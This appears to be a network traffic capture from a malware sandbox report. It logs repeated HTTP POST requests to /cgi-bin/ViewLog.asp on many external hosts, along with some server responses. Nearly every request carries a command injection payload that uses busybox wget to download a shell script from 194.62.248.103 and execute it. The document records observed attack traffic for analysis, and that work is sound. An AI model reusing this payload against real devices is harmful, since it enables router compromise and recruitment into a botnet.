                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:54.526060104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.397567987 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:06.076443911 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:21.434431076 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:53.685883999 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        346192.168.2.235766885.195.85.718080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:52.262453079 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.557986975 CEST341INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:35:53 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Content-Encoding: gzip
                                                        Data Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        347192.168.2.233517831.136.112.1618080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:52.281629086 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:55.326015949 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.469265938 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:13.499541998 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:39.351814985 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:28.500963926 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        348192.168.2.233453885.222.95.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:52.304605961 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.645474911 CEST224INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        349192.168.2.235462294.111.42.1328080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:52.334886074 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        350192.168.2.233810294.123.92.1318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:52.598185062 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        351192.168.2.235275094.123.33.988080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:52.602003098 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        352192.168.2.234478294.122.7.1308080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:52.607161045 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        353192.168.2.233847031.4.43.318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:52.963453054 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        354192.168.2.235114831.33.10.1438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:53.255111933 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:54.174112082 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:55.997817993 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        355192.168.2.233510894.130.244.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:53.560993910 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:53.865726948 CEST370INHTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:53 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 138
                                                        Connection: close
                                                        Location: https://192.168.0.14:8080/cgi-bin/ViewLog.asp
                                                        TH_ISPC: 1
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        356192.168.2.234291231.136.90.838080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:53.569891930 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:54.526046991 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:56.445770025 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:00.445314884 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:08.124169111 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:23.482034922 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:55.733539104 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
